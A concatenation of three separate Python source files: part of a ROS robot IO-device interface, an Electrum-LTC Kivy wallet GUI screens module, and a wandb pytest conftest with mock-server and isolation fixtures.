def get_port_type(self, port_name):
"""
return the type of the given port, or None
"""
with self.state_mutex:
if port_name in self.ports.keys():
return copy.deepcopy(self.ports[port_name]['type'])
return None
def get_port_value(self, port_name):
"""
return the value of the given port, or None
"""
with self.state_mutex:
if port_name in self.ports.keys():
return copy.deepcopy(self.ports[port_name]['data'])
return None
def set_port_value(self, port_name, port_value, port_type=None, timeout=5.0):
"""
set the value for the given port
return True if the port value is set, False if the requested port is invalid
"""
if port_name not in self.list_port_names():
rospy.logerr("Cannot find port '{0}' in this IO Device ({1}).".format(port_name,
self._path))
return
if port_type is None:
p_type = self.get_port_type(port_name)
if p_type is None:
rospy.logerr("Failed to get 'type' for port '{0}'.".format(port_name))
return
else:
p_type = port_type
set_command = SetCommand().set_port(port_name, p_type, port_value)
self.publish_command(set_command.op, set_command.args, timeout=timeout)
# make sure both state and config are valid:
self.revalidate(timeout, invalidate_state=False, invalidate_config=False)
def register_callback(self, callback_function, signal_name, poll_rate=10):
"""
Registers a supplied callback to a change in state of supplied
signal_name's value. Spawns a thread that will call the callback with
the updated value.
@type: function
@param: function handle for callback function
@type: str
@param: the signal name (button or wheel) to poll for value change
@type: int
@param: the rate at which to poll for a value change (in a separate
thread)
@rtype: str
@return: callback_id returned if the callback was registered, and an
empty string if the requested signal_name does not exist in the
Navigator
"""
if signal_name in self.list_signal_names():
callback_id = uuid.uuid4()
self._callback_items[callback_id] = intera_dataflow.Signal()
def signal_spinner():
old_state = self.get_signal_value(signal_name)
r = rospy.Rate(poll_rate)
while not rospy.is_shutdown():
new_state = self.get_signal_value(signal_name)
if new_state != old_state:
self._callback_items[callback_id](new_state)
old_state = new_state
r.sleep()
self._callback_items[callback_id].connect(callback_function)
t = threading.Thread(target=signal_spinner)
t.daemon = True
t.start()
self._threads[callback_id] = t
self._callback_functions[callback_id] = callback_function
return callback_id
else:
return str()
def deregister_callback(self, callback_id):
"""
Deregisters a callback based on the supplied callback_id.
@type: str
@param: the callback_id string to deregister
@rtype: bool
@return: returns bool True if the callback was successfully
deregistered, and False otherwise.
"""
if callback_id in self._threads.keys():
self._callback_items[callback_id].disconnect(
self._callback_functions[callback_id])
return True
else:
return False
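# ---------------------------------------------------------------------------
# Usage sketch (illustrative only, not part of the interface above): how a
# caller might watch a signal via register_callback/deregister_callback.
# The node, device and signal names are hypothetical placeholders; substitute
# the ones actually reported by your robot.
#
#     rospy.init_node('io_interface_example')
#     io = IODeviceInterface('robot', 'cuff')     # hypothetical node/device
#
#     def on_change(value):
#         rospy.loginfo("signal changed to %s" % (value,))
#
#     callback_id = io.register_callback(on_change, 'right_button_upper')
#     rospy.sleep(10.0)                           # let the poller run a while
#     io.deregister_callback(callback_id)
# ---------------------------------------------------------------------------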
|
screens.py
|
import asyncio
from decimal import Decimal
import threading
from typing import TYPE_CHECKING, List, Optional, Dict, Any
from kivy.app import App
from kivy.clock import Clock
from kivy.properties import ObjectProperty
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.uix.recycleview import RecycleView
from electrum_ltc.invoices import (PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING,
PR_PAID, PR_UNKNOWN, PR_EXPIRED, PR_INFLIGHT,
LNInvoice, pr_expiration_values, Invoice, OnchainInvoice)
from electrum_ltc import bitcoin, constants
from electrum_ltc.transaction import tx_from_any, PartialTxOutput
from electrum_ltc.util import (parse_URI, InvalidBitcoinURI, TxMinedInfo, maybe_extract_bolt11_invoice,
InvoiceError, format_time, parse_max_spend)
from electrum_ltc.lnaddr import lndecode, LnInvoiceException
from electrum_ltc.logging import Logger
from .dialogs.confirm_tx_dialog import ConfirmTxDialog
from electrum_ltc.gui.kivy import KIVY_GUI_PATH
from electrum_ltc.gui.kivy.i18n import _
if TYPE_CHECKING:
from electrum_ltc.gui.kivy.main_window import ElectrumWindow
from electrum_ltc.paymentrequest import PaymentRequest
class HistoryRecycleView(RecycleView):
pass
class RequestRecycleView(RecycleView):
pass
class PaymentRecycleView(RecycleView):
pass
class CScreen(Factory.Screen):
__events__ = ('on_activate', 'on_deactivate', 'on_enter', 'on_leave')
action_view = ObjectProperty(None)
kvname = None
app = App.get_running_app() # type: ElectrumWindow
def on_enter(self):
# FIXME: use a proper event instead of relying on the screen's animation time
Clock.schedule_once(lambda dt: self.dispatch('on_activate'), .25)
pass
def update(self):
pass
def on_activate(self):
setattr(self.app, self.kvname + '_screen', self)
self.update()
def on_leave(self):
self.dispatch('on_deactivate')
def on_deactivate(self):
pass
# note: this list needs to be kept in sync with another in qt
TX_ICONS = [
"unconfirmed",
"close",
"unconfirmed",
"close",
"clock1",
"clock2",
"clock3",
"clock4",
"clock5",
"confirmed",
]
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/history.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/send.kv')
Builder.load_file(KIVY_GUI_PATH + '/uix/ui_screens/receive.kv')
class HistoryScreen(CScreen):
tab = ObjectProperty(None)
kvname = 'history'
cards = {}
def __init__(self, **kwargs):
self.ra_dialog = None
super(HistoryScreen, self).__init__(**kwargs)
def show_item(self, obj):
key = obj.key
tx_item = self.history.get(key)
if tx_item.get('lightning') and tx_item['type'] == 'payment':
self.app.lightning_tx_dialog(tx_item)
return
if tx_item.get('lightning'):
tx = self.app.wallet.lnworker.lnwatcher.db.get_transaction(key)
else:
tx = self.app.wallet.db.get_transaction(key)
if not tx:
return
self.app.tx_dialog(tx)
def get_card(self, tx_item): #tx_hash, tx_mined_status, value, balance):
is_lightning = tx_item.get('lightning', False)
timestamp = tx_item['timestamp']
key = tx_item.get('txid') or tx_item['payment_hash']
if is_lightning:
status_str = 'unconfirmed' if timestamp is None else format_time(int(timestamp))
icon = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/lightning'
message = tx_item['label']
fee_msat = tx_item['fee_msat']
fee = int(fee_msat/1000) if fee_msat else None
fee_text = '' if fee is None else 'fee: %d sat'%fee
else:
tx_hash = tx_item['txid']
tx_mined_info = TxMinedInfo(height=tx_item['height'],
conf=tx_item['confirmations'],
timestamp=tx_item['timestamp'])
status, status_str = self.app.wallet.get_tx_status(tx_hash, tx_mined_info)
icon = f'atlas://{KIVY_GUI_PATH}/theming/atlas/light/' + TX_ICONS[status]
message = tx_item['label'] or tx_hash
fee = tx_item['fee_sat']
fee_text = '' if fee is None else 'fee: %d sat'%fee
ri = {}
ri['screen'] = self
ri['key'] = key
ri['icon'] = icon
ri['date'] = status_str
ri['message'] = message
ri['fee_text'] = fee_text
value = tx_item['value'].value
if value is not None:
ri['is_mine'] = value <= 0
ri['amount'] = self.app.format_amount(value, is_diff=True)
ri['base_unit'] = self.app.base_unit
if 'fiat_value' in tx_item:
ri['quote_text'] = str(tx_item['fiat_value'])
ri['fx_ccy'] = tx_item['fiat_value'].ccy
return ri
def update(self, see_all=False):
wallet = self.app.wallet
if wallet is None:
return
self.history = wallet.get_full_history(self.app.fx)
history = reversed(self.history.values())
history_card = self.ids.history_container
history_card.data = [self.get_card(item) for item in history]
class SendScreen(CScreen, Logger):
kvname = 'send'
payment_request = None # type: Optional[PaymentRequest]
parsed_URI = None
def __init__(self, **kwargs):
CScreen.__init__(self, **kwargs)
Logger.__init__(self)
self.is_max = False
def set_URI(self, text: str):
if not self.app.wallet:
return
# interpret as lightning URI
bolt11_invoice = maybe_extract_bolt11_invoice(text)
if bolt11_invoice:
self.set_ln_invoice(bolt11_invoice)
# interpret as BIP21 URI
else:
self.set_bip21(text)
def set_bip21(self, text: str):
try:
uri = parse_URI(text, self.app.on_pr, loop=self.app.asyncio_loop)
except InvalidBitcoinURI as e:
self.app.show_info(_("Error parsing URI") + f":\n{e}")
return
self.parsed_URI = uri
amount = uri.get('amount')
self.address = uri.get('address', '')
self.message = uri.get('message', '')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.is_max = False
self.payment_request = None
self.is_lightning = False
def set_ln_invoice(self, invoice: str):
try:
invoice = str(invoice).lower()
lnaddr = lndecode(invoice)
except LnInvoiceException as e:
self.app.show_info(_("Invoice is not a valid Lightning invoice: ") + repr(e)) # repr because str(Exception()) == ''
return
self.address = invoice
self.message = dict(lnaddr.tags).get('d', None)
self.amount = self.app.format_amount_and_units(lnaddr.amount * bitcoin.COIN) if lnaddr.amount else ''
self.payment_request = None
self.is_lightning = True
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_invoices()
_list.reverse()
payments_container = self.ids.payments_container
payments_container.data = [self.get_card(invoice) for invoice in _list]
def update_item(self, key, invoice):
payments_container = self.ids.payments_container
data = payments_container.data
for item in data:
if item['key'] == key:
item.update(self.get_card(invoice))
payments_container.data = data
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_invoice(obj.is_lightning, obj.key)
def get_card(self, item: Invoice) -> Dict[str, Any]:
status = self.app.wallet.get_invoice_status(item)
status_str = item.get_status_str(status)
is_lightning = item.type == PR_TYPE_LN
key = self.app.wallet.get_key_for_outgoing_invoice(item)
if is_lightning:
assert isinstance(item, LNInvoice)
address = item.rhash
if self.app.wallet.lnworker:
log = self.app.wallet.lnworker.logs.get(key)
if status == PR_INFLIGHT and log:
status_str += '... (%d)'%len(log)
is_bip70 = False
else:
assert isinstance(item, OnchainInvoice)
address = item.get_address()
is_bip70 = bool(item.bip70)
return {
'is_lightning': is_lightning,
'is_bip70': is_bip70,
'screen': self,
'status': status,
'status_str': status_str,
'key': key,
'memo': item.message or _('No Description'),
'address': address,
'amount': self.app.format_amount_and_units(item.get_amount_sat() or 0),
}
def do_clear(self):
self.amount = ''
self.message = ''
self.address = ''
self.payment_request = None
self.is_lightning = False
self.is_bip70 = False
self.parsed_URI = None
self.is_max = False
def set_request(self, pr: 'PaymentRequest'):
self.address = pr.get_requestor()
amount = pr.get_amount()
self.amount = self.app.format_amount_and_units(amount) if amount else ''
self.message = pr.get_memo()
self.locked = True
self.payment_request = pr
def do_paste(self):
data = self.app._clipboard.paste().strip()
if not data:
self.app.show_info(_("Clipboard is empty"))
return
# try to decode as transaction
try:
tx = tx_from_any(data)
tx.deserialize()
except:
tx = None
if tx:
self.app.tx_dialog(tx)
return
# try to decode as URI/address
bolt11_invoice = maybe_extract_bolt11_invoice(data)
if bolt11_invoice is not None:
self.set_ln_invoice(bolt11_invoice)
else:
self.set_URI(data)
def read_invoice(self):
address = str(self.address)
if not address:
self.app.show_error(_('Recipient not specified.') + ' ' + _('Please scan a Litecoin address or a payment request'))
return
if not self.amount:
self.app.show_error(_('Please enter an amount'))
return
if self.is_max:
amount = '!'
else:
try:
amount = self.app.get_amount(self.amount)
except:
self.app.show_error(_('Invalid amount') + ':\n' + self.amount)
return
message = self.message
try:
if self.is_lightning:
return LNInvoice.from_bech32(address)
else: # on-chain
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
if not bitcoin.is_address(address):
self.app.show_error(_('Invalid Litecoin Address') + ':\n' + address)
return
outputs = [PartialTxOutput.from_address_and_value(address, amount)]
return self.app.wallet.create_invoice(
outputs=outputs,
message=message,
pr=self.payment_request,
URI=self.parsed_URI)
except InvoiceError as e:
self.app.show_error(_('Error creating payment') + ':\n' + str(e))
def do_save(self):
invoice = self.read_invoice()
if not invoice:
return
self.save_invoice(invoice)
def save_invoice(self, invoice):
self.app.wallet.save_invoice(invoice)
self.do_clear()
self.update()
def do_pay(self):
invoice = self.read_invoice()
if not invoice:
return
self.do_pay_invoice(invoice)
def do_pay_invoice(self, invoice):
if invoice.is_lightning():
if self.app.wallet.lnworker:
amount_sat = invoice.get_amount_sat()
msg = _("Pay lightning invoice?") + '\n\n' + _("This will send {}?").format(self.app.format_amount_and_units_with_fiat(amount_sat)) +'\n'
self.app.protected(msg, self._do_pay_lightning, (invoice,))
else:
self.app.show_error(_("Lightning payments are not available for this wallet"))
else:
self._do_pay_onchain(invoice)
def _do_pay_lightning(self, invoice: LNInvoice, pw) -> None:
def pay_thread():
try:
coro = self.app.wallet.lnworker.pay_invoice(invoice.invoice, attempts=10)
fut = asyncio.run_coroutine_threadsafe(coro, self.app.network.asyncio_loop)
fut.result()
except Exception as e:
self.app.show_error(repr(e))
self.save_invoice(invoice)
threading.Thread(target=pay_thread).start()
def _do_pay_onchain(self, invoice: OnchainInvoice) -> None:
outputs = invoice.outputs
amount = sum(map(lambda x: x.value, outputs)) if not any(parse_max_spend(x.value) for x in outputs) else '!'
coins = self.app.wallet.get_spendable_coins(None)
make_tx = lambda rbf: self.app.wallet.make_unsigned_transaction(coins=coins, outputs=outputs, rbf=rbf)
on_pay = lambda tx: self.app.protected(_('Send payment?'), self.send_tx, (tx, invoice))
d = ConfirmTxDialog(self.app, amount=amount, make_tx=make_tx, on_pay=on_pay)
d.open()
def send_tx(self, tx, invoice, password):
if self.app.wallet.has_password() and password is None:
return
self.save_invoice(invoice)
def on_success(tx):
if tx.is_complete():
self.app.broadcast(tx)
else:
self.app.tx_dialog(tx)
def on_failure(error):
self.app.show_error(error)
if self.app.wallet.can_sign(tx):
self.app.show_info("Signing...")
self.app.sign_tx(tx, password, on_success, on_failure)
else:
self.app.tx_dialog(tx)
class ReceiveScreen(CScreen):
kvname = 'receive'
def __init__(self, **kwargs):
super(ReceiveScreen, self).__init__(**kwargs)
Clock.schedule_interval(lambda dt: self.update(), 5)
self.is_max = False # not used for receiving (see app.amount_dialog)
def expiry(self):
return self.app.electrum_config.get('request_expiry', PR_DEFAULT_EXPIRATION_WHEN_CREATING)
def clear(self):
self.address = ''
self.amount = ''
self.message = ''
self.lnaddr = ''
def set_address(self, addr):
self.address = addr
def on_address(self, addr):
req = self.app.wallet.get_request(addr)
self.status = ''
if req:
self.message = req.get('memo', '')
amount = req.get('amount')
self.amount = self.app.format_amount_and_units(amount) if amount else ''
status = req.get('status', PR_UNKNOWN)
self.status = _('Payment received') if status == PR_PAID else ''
def get_URI(self):
from electrum_ltc.util import create_bip21_uri
amount = self.app.get_amount(self.amount)
return create_bip21_uri(self.address, amount, self.message)
def do_copy(self):
uri = self.get_URI()
self.app._clipboard.copy(uri)
self.app.show_info(_('Request copied to clipboard'))
def new_request(self, lightning):
amount = self.amount
amount = self.app.get_amount(amount) if amount else 0
message = self.message
lnworker = self.app.wallet.lnworker
try:
if lightning:
if lnworker:
key = lnworker.add_request(amount, message, self.expiry())
else:
self.app.show_error(_("Lightning payments are not available for this wallet"))
return
else:
addr = self.address or self.app.wallet.get_unused_address()
if not addr:
if not self.app.wallet.is_deterministic():
addr = self.app.wallet.get_receiving_address()
else:
self.app.show_info(_('No address available. Please remove some of your pending requests.'))
return
self.address = addr
req = self.app.wallet.make_payment_request(addr, amount, message, self.expiry())
self.app.wallet.add_payment_request(req)
key = addr
except InvoiceError as e:
self.app.show_error(_('Error creating payment request') + ':\n' + str(e))
return
self.clear()
self.update()
self.app.show_request(lightning, key)
def get_card(self, req: Invoice) -> Dict[str, Any]:
is_lightning = req.is_lightning()
if not is_lightning:
assert isinstance(req, OnchainInvoice)
address = req.get_address()
else:
assert isinstance(req, LNInvoice)
address = req.invoice
key = self.app.wallet.get_key_for_receive_request(req)
amount = req.get_amount_sat()
description = req.message
status = self.app.wallet.get_request_status(key)
status_str = req.get_status_str(status)
ci = {}
ci['screen'] = self
ci['address'] = address
ci['is_lightning'] = is_lightning
ci['key'] = key
ci['amount'] = self.app.format_amount_and_units(amount) if amount else ''
ci['memo'] = description or _('No Description')
ci['status'] = status
ci['status_str'] = status_str
return ci
def update(self):
if self.app.wallet is None:
return
_list = self.app.wallet.get_unpaid_requests()
_list.reverse()
requests_container = self.ids.requests_container
requests_container.data = [self.get_card(item) for item in _list]
def update_item(self, key, request):
payments_container = self.ids.requests_container
data = payments_container.data
for item in data:
if item['key'] == key:
status = self.app.wallet.get_request_status(key)
status_str = request.get_status_str(status)
item['status'] = status
item['status_str'] = status_str
payments_container.data = data # needed?
payments_container.refresh_from_data()
def show_item(self, obj):
self.app.show_request(obj.is_lightning, obj.key)
def expiration_dialog(self, obj):
from .dialogs.choice_dialog import ChoiceDialog
def callback(c):
self.app.electrum_config.set_key('request_expiry', c)
d = ChoiceDialog(_('Expiration date'), pr_expiration_values, self.expiry(), callback)
d.open()
class TabbedCarousel(Factory.TabbedPanel):
'''Custom TabbedPanel using a carousel used in the Main Screen
'''
carousel = ObjectProperty(None)
def animate_tab_to_center(self, value):
scrlv = self._tab_strip.parent
if not scrlv:
return
idx = self.tab_list.index(value)
n = len(self.tab_list)
if idx in [0, 1]:
scroll_x = 1
elif idx in [n-1, n-2]:
scroll_x = 0
else:
scroll_x = 1. * (n - idx - 1) / (n - 1)
mation = Factory.Animation(scroll_x=scroll_x, d=.25)
mation.cancel_all(scrlv)
mation.start(scrlv)
def on_current_tab(self, instance, value):
self.animate_tab_to_center(value)
def on_index(self, instance, value):
current_slide = instance.current_slide
if not hasattr(current_slide, 'tab'):
return
tab = current_slide.tab
ct = self.current_tab
try:
if ct.text != tab.text:
carousel = self.carousel
carousel.slides[ct.slide].dispatch('on_leave')
self.switch_to(tab)
carousel.slides[tab.slide].dispatch('on_enter')
except AttributeError:
current_slide.dispatch('on_enter')
def switch_to(self, header):
# we have to replace the functionality of the original switch_to
if not header:
return
if not hasattr(header, 'slide'):
header.content = self.carousel
super(TabbedCarousel, self).switch_to(header)
try:
tab = self.tab_list[-1]
except IndexError:
return
self._current_tab = tab
tab.state = 'down'
return
carousel = self.carousel
self.current_tab.state = "normal"
header.state = 'down'
self._current_tab = header
# set the carousel to load the appropriate slide
# saved in the screen attribute of the tab head
slide = carousel.slides[header.slide]
if carousel.current_slide != slide:
carousel.current_slide.dispatch('on_leave')
carousel.load_slide(slide)
slide.dispatch('on_enter')
def add_widget(self, widget, index=0):
if isinstance(widget, Factory.CScreen):
self.carousel.add_widget(widget)
return
super(TabbedCarousel, self).add_widget(widget, index=index)
|
conftest.py
|
from __future__ import print_function
import pytest
import time
import datetime
import requests
import os
import sys
import threading
import logging
import shutil
from contextlib import contextmanager
from tests import utils
from six.moves import queue
from wandb import wandb_sdk
# from multiprocessing import Process
import subprocess
import click
from click.testing import CliRunner
import webbrowser
import git
import psutil
import atexit
import wandb
from wandb.util import mkdir_exists_ok
from six.moves import urllib
from wandb.sdk.lib.module import unset_globals
from wandb.sdk.lib.git import GitRepo
from wandb.sdk.internal.handler import HandleManager
from wandb.sdk.internal.sender import SendManager
from wandb.sdk.interface.interface import BackendSender
from wandb.proto import wandb_internal_pb2
from wandb.proto import wandb_internal_pb2 as pb
try:
import nbformat
except ImportError: # TODO: no fancy notebook fun in python2
pass
try:
from unittest.mock import MagicMock
except ImportError: # TODO: this is only for python2
from mock import MagicMock
DUMMY_API_KEY = "1824812581259009ca9981580f8f8a9012409eee"
class ServerMap(object):
def __init__(self):
self._map = {}
def items(self):
return self._map.items()
def __getitem__(self, worker_id):
if self._map.get(worker_id) is None:
self._map[worker_id] = start_mock_server(worker_id)
return self._map[worker_id]
servers = ServerMap()
def test_cleanup(*args, **kwargs):
print("Shutting down mock servers")
for wid, server in servers.items():
print("Shutting down {}".format(wid))
server.terminate()
print("Open files during tests: ")
proc = psutil.Process()
print(proc.open_files())
def start_mock_server(worker_id):
"""We start a flask server process for each pytest-xdist worker_id"""
port = utils.free_port()
root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
path = os.path.join(root, "tests", "utils", "mock_server.py")
command = [sys.executable, "-u", path]
env = os.environ
env["PORT"] = str(port)
env["PYTHONPATH"] = root
logfname = os.path.join(
root, "tests", "logs", "live_mock_server-{}.log".format(worker_id)
)
logfile = open(logfname, "w")
server = subprocess.Popen(
command,
stdout=logfile,
env=env,
stderr=subprocess.STDOUT,
bufsize=1,
close_fds=True,
)
server._port = port
server.base_url = "http://localhost:%i" % server._port
def get_ctx():
return requests.get(server.base_url + "/ctx").json()
def set_ctx(payload):
return requests.put(server.base_url + "/ctx", json=payload).json()
def reset_ctx():
return requests.delete(server.base_url + "/ctx").json()
server.get_ctx = get_ctx
server.set_ctx = set_ctx
server.reset_ctx = reset_ctx
started = False
for i in range(10):
try:
res = requests.get("%s/ctx" % server.base_url, timeout=5)
if res.status_code == 200:
started = True
break
print("Attempting to connect but got: %s" % res)
except requests.exceptions.RequestException:
print(
"Timed out waiting for server to start...", server.base_url, time.time()
)
if server.poll() is None:
time.sleep(1)
else:
raise ValueError("Server failed to start.")
if started:
print("Mock server listing on {} see {}".format(server._port, logfname))
else:
server.terminate()
print("Server failed to launch, see {}".format(logfname))
try:
print("=" * 40)
with open(logfname) as f:
for logline in f.readlines():
print(logline.strip())
print("=" * 40)
except Exception as e:
print("EXCEPTION:", e)
raise ValueError("Failed to start server! Exit code %s" % server.returncode)
return server
atexit.register(test_cleanup)
@pytest.fixture
def test_name(request):
# change "test[1]" to "test__1__"
name = urllib.parse.quote(request.node.name.replace("[", "__").replace("]", "__"))
return name
@pytest.fixture
def test_dir(test_name):
orig_dir = os.getcwd()
root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
test_dir = os.path.join(root, "tests", "logs", test_name)
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
mkdir_exists_ok(test_dir)
os.chdir(test_dir)
yield test_dir
os.chdir(orig_dir)
@pytest.fixture
def git_repo(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
mkdir_exists_ok("wandb")
# Because the forked process doesn't use my monkey patch above
with open("wandb/settings", "w") as f:
f.write("[default]\nproject: test")
open("README", "wb").close()
r.index.add(["README"])
r.index.commit("Initial commit")
yield GitRepo(lazy=False)
@pytest.fixture
def git_repo_with_remote(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
r.create_remote("origin", "https://foo:bar@github.com/FooTest/Foo.git")
yield GitRepo(lazy=False)
@pytest.fixture
def git_repo_with_remote_and_empty_pass(runner):
with runner.isolated_filesystem():
r = git.Repo.init(".")
r.create_remote("origin", "https://foo:@github.com/FooTest/Foo.git")
yield GitRepo(lazy=False)
@pytest.fixture
def dummy_api_key():
return DUMMY_API_KEY
@pytest.fixture
def test_settings(test_dir, mocker, live_mock_server):
"""Settings object for tests"""
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
wandb.wandb_sdk.wandb_run.EXIT_TIMEOUT = 15
wandb.wandb_sdk.wandb_setup._WandbSetup.instance = None
wandb_dir = os.path.join(test_dir, "wandb")
mkdir_exists_ok(wandb_dir)
# root = os.path.abspath(os.path.join(os.path.dirname(__file__), ".."))
settings = wandb.Settings(
_start_time=time.time(),
base_url=live_mock_server.base_url,
root_dir=test_dir,
save_code=False,
project="test",
console="off",
host="test",
api_key=DUMMY_API_KEY,
run_id=wandb.util.generate_id(),
_start_datetime=datetime.datetime.now(),
)
yield settings
# Just in case someone forgets to join in tests
if wandb.run is not None:
wandb.run.finish()
@pytest.fixture
def mocked_run(runner, test_settings):
"""A managed run object for tests with a mock backend"""
run = wandb.wandb_sdk.wandb_run.Run(settings=test_settings)
run._set_backend(MagicMock())
yield run
@pytest.fixture
def runner(monkeypatch, mocker):
# monkeypatch.setattr('wandb.cli.api', InternalApi(
# default_settings={'project': 'test', 'git_tag': True}, load_settings=False))
monkeypatch.setattr(wandb.util, "prompt_choices", lambda x: x[0])
monkeypatch.setattr(wandb.wandb_lib.apikey, "prompt_choices", lambda x: x[0])
monkeypatch.setattr(click, "launch", lambda x: 1)
monkeypatch.setattr(webbrowser, "open_new_tab", lambda x: True)
mocker.patch("wandb.wandb_lib.apikey.isatty", lambda stream: True)
mocker.patch("wandb.wandb_lib.apikey.input", lambda x: 1)
mocker.patch("wandb.wandb_lib.apikey.getpass.getpass", lambda x: DUMMY_API_KEY)
return CliRunner()
@pytest.fixture(autouse=True)
def reset_setup():
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
@pytest.fixture(autouse=True)
def local_netrc(monkeypatch):
"""Never use our real credentials, put them in their own isolated dir"""
with CliRunner().isolated_filesystem():
# TODO: this seems overkill...
origexpand = os.path.expanduser
# Touch that netrc
open(".netrc", "wb").close()
def expand(path):
if "netrc" in path:
try:
ret = os.path.realpath("netrc")
except OSError:
ret = origexpand(path)
else:
ret = origexpand(path)
return ret
monkeypatch.setattr(os.path, "expanduser", expand)
yield
@pytest.fixture(autouse=True)
def local_settings(mocker):
"""Place global settings in an isolated dir"""
with CliRunner().isolated_filesystem():
cfg_path = os.path.join(os.getcwd(), ".config", "wandb", "settings")
mkdir_exists_ok(os.path.join(".config", "wandb"))
mocker.patch("wandb.old.settings.Settings._global_path", return_value=cfg_path)
yield
@pytest.fixture
def mock_server(mocker):
return utils.mock_server(mocker)
# We create one live_mock_server per pytest-xdist worker
@pytest.fixture
def live_mock_server(request, worker_id):
global servers
server = servers[worker_id]
name = urllib.parse.quote(request.node.name)
# We set the username so the mock backend can namespace state
os.environ["WANDB_USERNAME"] = name
os.environ["WANDB_BASE_URL"] = server.base_url
os.environ["WANDB_ERROR_REPORTING"] = "false"
os.environ["WANDB_API_KEY"] = DUMMY_API_KEY
# clear mock server ctx
server.reset_ctx()
yield server
del os.environ["WANDB_USERNAME"]
del os.environ["WANDB_BASE_URL"]
del os.environ["WANDB_ERROR_REPORTING"]
del os.environ["WANDB_API_KEY"]
@pytest.fixture
def notebook(live_mock_server, test_dir):
"""This launches a live server, configures a notebook to use it, and enables
devs to execute arbitrary cells. See tests/test_notebooks.py
"""
@contextmanager
def notebook_loader(nb_path, kernel_name="wandb_python", save_code=True, **kwargs):
with open(utils.notebook_path("setup.ipynb")) as f:
setupnb = nbformat.read(f, as_version=4)
setupcell = setupnb["cells"][0]
# Ensure the notebook talks to our mock server
new_source = setupcell["source"].replace(
"__WANDB_BASE_URL__", live_mock_server.base_url,
)
if save_code:
new_source = new_source.replace("__WANDB_NOTEBOOK_NAME__", nb_path)
else:
new_source = new_source.replace("__WANDB_NOTEBOOK_NAME__", "")
setupcell["source"] = new_source
nb_path = utils.notebook_path(nb_path)
shutil.copy(nb_path, os.path.join(os.getcwd(), os.path.basename(nb_path)))
with open(nb_path) as f:
nb = nbformat.read(f, as_version=4)
nb["cells"].insert(0, setupcell)
try:
client = utils.WandbNotebookClient(nb, kernel_name=kernel_name)
with client.setup_kernel(**kwargs):
# Run setup commands for mocks
client.execute_cells(-1, store_history=False)
yield client
finally:
with open(os.path.join(os.getcwd(), "notebook.log"), "w") as f:
f.write(client.all_output_text())
wandb.termlog("Find debug logs at: %s" % os.getcwd())
wandb.termlog(client.all_output_text())
notebook_loader.base_url = live_mock_server.base_url
return notebook_loader
@pytest.fixture
def mocked_module(monkeypatch):
"""This allows us to mock modules loaded via wandb.util.get_module"""
def mock_get_module(module):
orig_get_module = wandb.util.get_module
mocked_module = MagicMock()
def get_module(mod):
if mod == module:
return mocked_module
else:
return orig_get_module(mod)
monkeypatch.setattr(wandb.util, "get_module", get_module)
return mocked_module
return mock_get_module
@pytest.fixture
def mocked_ipython(monkeypatch):
monkeypatch.setattr(
wandb.wandb_sdk.wandb_settings, "_get_python_type", lambda: "jupyter"
)
ipython = MagicMock()
# TODO: this is really unfortunate, for reasons not clear to me, monkeypatch doesn't work
orig_get_ipython = wandb.jupyter.get_ipython
wandb.jupyter.get_ipython = lambda: ipython
yield ipython
wandb.jupyter.get_ipython = orig_get_ipython
def default_wandb_args():
"""This allows us to parameterize the wandb_init_run fixture
The most general arg is "env", you can call:
@pytest.mark.wandb_args(env={"WANDB_API_KEY": "XXX"})
To set env vars and have them unset when the test completes.
"""
return {
"error": None,
"k8s": None,
"sagemaker": False,
"tensorboard": False,
"resume": False,
"env": {},
"wandb_init": {},
}
def mocks_from_args(mocker, args, mock_server):
if args["k8s"] is not None:
mock_server.ctx["k8s"] = args["k8s"]
args["env"].update(utils.mock_k8s(mocker))
if args["sagemaker"]:
args["env"].update(utils.mock_sagemaker(mocker))
@pytest.fixture
def wandb_init_run(request, runner, mocker, mock_server):
marker = request.node.get_closest_marker("wandb_args")
args = default_wandb_args()
if marker:
args.update(marker.kwargs)
try:
mocks_from_args(mocker, args, mock_server)
for k, v in args["env"].items():
os.environ[k] = v
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
# We want to run setup every time in tests
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
mocker.patch("wandb.wandb_sdk.wandb_init.Backend", utils.BackendMock)
run = wandb.init(
settings=wandb.Settings(console="off", mode="offline", _except_exit=False),
**args["wandb_init"]
)
yield run
wandb.join()
finally:
unset_globals()
for k, v in args["env"].items():
del os.environ[k]
@pytest.fixture
def wandb_init(request, runner, mocker, mock_server):
def init(*args, **kwargs):
try:
mocks_from_args(mocker, default_wandb_args(), mock_server)
# TODO: likely not the right thing to do, we shouldn't be setting this
wandb._IS_INTERNAL_PROCESS = False
# We want to run setup every time in tests
wandb.wandb_sdk.wandb_setup._WandbSetup._instance = None
mocker.patch("wandb.wandb_sdk.wandb_init.Backend", utils.BackendMock)
return wandb.init(
settings=wandb.Settings(
console="off", mode="offline", _except_exit=False
),
*args,
**kwargs
)
finally:
unset_globals()
return init
@pytest.fixture()
def restore_version():
save_current_version = wandb.__version__
yield
wandb.__version__ = save_current_version
try:
del wandb.__hack_pypi_latest_version__
except AttributeError:
pass
@pytest.fixture()
def disable_console():
os.environ["WANDB_CONSOLE"] = "off"
yield
del os.environ["WANDB_CONSOLE"]
@pytest.fixture()
def parse_ctx():
"""Fixture providing class to parse context data."""
def parse_ctx_fn(ctx, run_id=None):
return utils.ParseCTX(ctx, run_id=run_id)
yield parse_ctx_fn
@pytest.fixture()
def record_q():
return queue.Queue()
@pytest.fixture()
def fake_interface(record_q):
return BackendSender(record_q=record_q)
@pytest.fixture
def fake_backend(fake_interface):
class FakeBackend:
def __init__(self):
